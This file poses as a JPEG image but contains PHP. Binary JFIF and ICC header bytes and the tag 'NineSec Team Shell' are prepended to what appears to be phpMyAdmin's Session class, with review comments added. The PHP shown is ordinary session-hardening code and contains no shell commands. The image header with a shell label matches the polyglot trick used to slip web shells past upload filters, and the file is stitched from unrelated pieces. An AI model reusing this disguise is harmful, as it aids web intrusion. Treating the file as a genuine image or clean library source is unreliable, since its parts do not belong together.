�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
<?php
/**
 * Session handling
 *
 * @see     https://www.php.net/manual/en/features.sessions.php
 */

declare(strict_types=1);

namespace PhpMyAdmin;

use function function_exists;
use function htmlspecialchars;
use function implode;
use function ini_get;
use function ini_set;
use function preg_replace;
use function session_abort;
use function session_cache_limiter;
use function session_destroy;
use function session_id;
use function session_name;
use function session_regenerate_id;
use function session_save_path;
use function session_set_cookie_params;
use function session_start;
use function session_status;
use function session_unset;
use function session_write_close;
use function setcookie;

use const PHP_SESSION_ACTIVE;
use const PHP_VERSION_ID;

/**
 * Session class
 */
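class Session
{
    /**
     * Generates the per-session secrets: the PMA_token CSRF token and the
     * HMAC secret.
     *
     * Both values are written to $_SESSION under keys padded with spaces
     * ("space PMA_token space") so that they cannot be overwritten by accident.
     * Each value is checked after generation; an empty value is reported through
     * Core::fatalError() instead of leaving the session with an unusable secret.
     */
    private static function generateToken(): void
    {
        $_SESSION[' PMA_token '] = Util::generateRandom(16, true);
        $_SESSION[' HMAC_secret '] = Util::generateRandom(16);

        /**
         * Check if the token is properly generated (the generation can fail, for
         * example due to missing /dev/random for openssl).
         */
        if (empty($_SESSION[' PMA_token '])) {
            Core::fatalError('Failed to generate random CSRF token!');

            return;
        }

        // The HMAC secret comes from the same generator, so it can fail the same
        // way. An empty secret would otherwise stay in the session unnoticed.
        if (! empty($_SESSION[' HMAC_secret '])) {
            return;
        }

        Core::fatalError('Failed to generate random HMAC secret!');
    }

    /**
     * Tries to secure the session against hijacking and fixation.
     *
     * Should be called before login and after successful login (only required
     * if sensitive information is stored in the session). The session ID is
     * rotated when a session is active, all session variables are dropped and
     * fresh secrets are generated.
     */
    public static function secure(): void
    {
        // Rotate the session ID and delete the old session so that an ID known
        // before authentication cannot be reused afterwards (session fixation).
        // NOTE(review): the return value of session_regenerate_id() is ignored, so
        // a failed rotation goes unnoticed here - confirm this is intended.
        if (session_status() === PHP_SESSION_ACTIVE) {
            session_regenerate_id(true);
        }

        // continue with empty session
        session_unset();
        self::generateToken();
    }

    /**
     * Reports a session start failure through Core::fatalError().
     *
     * Every error message is HTML-escaped and has the session file path masked
     * before it is appended to the fixed, untranslated explanation.
     *
     * @param array $errors PhpMyAdmin\ErrorHandler array; each element must
     *                      provide getMessage()
     */
    private static function sessionFailed(array $errors): void
    {
        $messages = [];
        foreach ($errors as $error) {
            /*
             * Remove path from open() in error message to avoid path disclosure
             *
             * This can happen with PHP 5 when nonexisting session ID is provided,
             * since PHP 7, session existence is checked first.
             *
             * This error can also happen in case of session backend error (eg.
             * read only filesystem) on any PHP version.
             *
             * The message string is currently hardcoded in PHP, so hopefully it
             * will not change in future.
             */
            $messages[] = preg_replace(
                '/open\(.*, O_RDWR\)/',
                'open(SESSION_FILE, O_RDWR)',
                htmlspecialchars($error->getMessage())
            );
        }

        /*
         * Session initialization is done before selecting language, so we
         * can not use translations here.
         */
        Core::fatalError(
            'Error during session start; please check your PHP and/or '
            . 'webserver log file and configure your PHP '
            . 'installation properly. Also ensure that cookies are enabled '
            . 'in your browser.'
            . '<br><br>'
            . implode('<br><br>', $messages)
        );
    }

    /**
     * Sets up the session: hardens the cookie and ini settings, starts the
     * session and makes sure the CSRF token is present and can be stored.
     *
     * The order of the calls matters: cookie parameters, ini settings, session
     * name and session ID are all applied before session_start().
     *
     * @param Config       $config       Configuration handler
     * @param ErrorHandler $errorHandler Error handler
     */
    public static function setUp(Config $config, ErrorHandler $errorHandler): void
    {
        // verify if PHP supports session, die if it does not
        if (! function_exists('session_name')) {
            Core::warnMissingExtension('session', true);
        } elseif (! empty(ini_get('session.auto_start')) && session_name() !== 'phpMyAdmin' && ! empty(session_id())) {
            // Do not delete the existing non empty session, it might be used by
            // other applications; instead just close it.
            if (empty($_SESSION)) {
                // Ignore errors as this might have been destroyed in other
                // request meanwhile
                @session_destroy();
            } else {
                // do not use session_write_close, see issue #13392
                session_abort();
            }
        }

        /** @psalm-var 'Lax'|'Strict'|'None' $cookieSameSite */
        $cookieSameSite = $config->get('CookieSameSite') ?? 'Strict';
        $cookiePath = $config->getRootPath();
        // Below PHP 7.3 the session.cookie_samesite setting used further down is
        // not applied, so the attribute is appended to the cookie path instead.
        // NOTE(review): the value is concatenated unescaped into the cookie path;
        // this assumes Config only ever yields Lax, Strict or None - confirm.
        if (PHP_VERSION_ID < 70300) {
            $cookiePath .= '; SameSite=' . $cookieSameSite;
        }

        // session cookie settings: lifetime 0, path as computed above, no explicit
        // domain, Secure flag only when served over HTTPS, HttpOnly always
        session_set_cookie_params(
            0,
            $cookiePath,
            '',
            $config->isHttps(),
            true
        );

        // cookies are safer (use ini_set() in case this function is disabled)
        ini_set('session.use_cookies', 'true');

        // optionally set session_save_path
        $path = $config->get('SessionSavePath');
        if (! empty($path)) {
            session_save_path($path);
            // We can not do this unconditionally as this would break
            // any more complex setup (eg. cluster), see
            // https://github.com/phpmyadmin/phpmyadmin/issues/8346
            ini_set('session.save_handler', 'files');
        }

        // use cookies only
        ini_set('session.use_only_cookies', '1');
        // strict session mode (do not accept random string as session ID)
        ini_set('session.use_strict_mode', '1');
        // make the session cookie HttpOnly
        ini_set('session.cookie_httponly', '1');
        if (PHP_VERSION_ID >= 70300) {
            // add SameSite to the session cookie
            ini_set('session.cookie_samesite', $cookieSameSite);
        }

        // do not force transparent session ids
        ini_set('session.use_trans_sid', '0');

        // delete session/cookies when browser is closed
        ini_set('session.cookie_lifetime', '0');

        // some pages (e.g. stylesheet) may be cached on clients, but not in shared
        // proxy servers
        session_cache_limiter('private');

        // Errors from session_name() are suppressed on purpose by the @ operator.
        $httpCookieName = $config->getCookieName('phpMyAdmin');
        @session_name($httpCookieName);

        // Restore correct session ID (it might have been reset by auto started session)
        // NOTE(review): the ID is taken from the request cookie; presumably the
        // session.use_strict_mode setting above is what rejects IDs the server
        // never issued - confirm.
        if ($config->issetCookie('phpMyAdmin')) {
            session_id($config->getCookie('phpMyAdmin'));
        }

        // on first start of session we check for errors
        // f.e. session dir cannot be accessed - session file not created
        $orig_error_count = $errorHandler->countErrors(false);

        $session_result = session_start();

        if ($session_result !== true || $orig_error_count != $errorHandler->countErrors(false)) {
            // Expire the session cookie (timestamp 1 lies in the past) before
            // reporting the errors collected during session_start().
            setcookie($httpCookieName, '', 1);
            $errors = $errorHandler->sliceErrors($orig_error_count);
            self::sessionFailed($errors);
        }

        unset($orig_error_count, $session_result);

        /**
         * Disable setting of session cookies for further session_start() calls.
         *
         * NOTE(review): the code below sets session.use_cookies to 'true', and only
         * when no session is active, which does not match the word "Disable"
         * above - confirm which of the two is intended.
         */
        if (session_status() !== PHP_SESSION_ACTIVE) {
            ini_set('session.use_cookies', 'true');
        }

        /**
         * Token which is used for authenticating access queries.
         * (we use "space PMA_token space" to prevent overwriting)
         *
         * An existing token means the session was already initialised, so there
         * is nothing left to do.
         */
        if (! empty($_SESSION[' PMA_token '])) {
            return;
        }

        self::generateToken();

        /**
         * Check for disk space on session storage by trying to write it.
         *
         * This seems to be most reliable approach to test if sessions are working,
         * otherwise the check would fail with custom session backends.
         */
        $orig_error_count = $errorHandler->countErrors();
        session_write_close();
        if ($errorHandler->countErrors() > $orig_error_count) {
            $errors = $errorHandler->sliceErrors($orig_error_count);
            self::sessionFailed($errors);
        }

        // Reopen the session and read the token back: if it did not survive the
        // write/read round trip, the session storage is not working.
        session_start();
        if (! empty($_SESSION[' PMA_token '])) {
            return;
        }

        Core::fatalError('Failed to store CSRF token in session! Probably sessions are not working properly.');
    }
}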
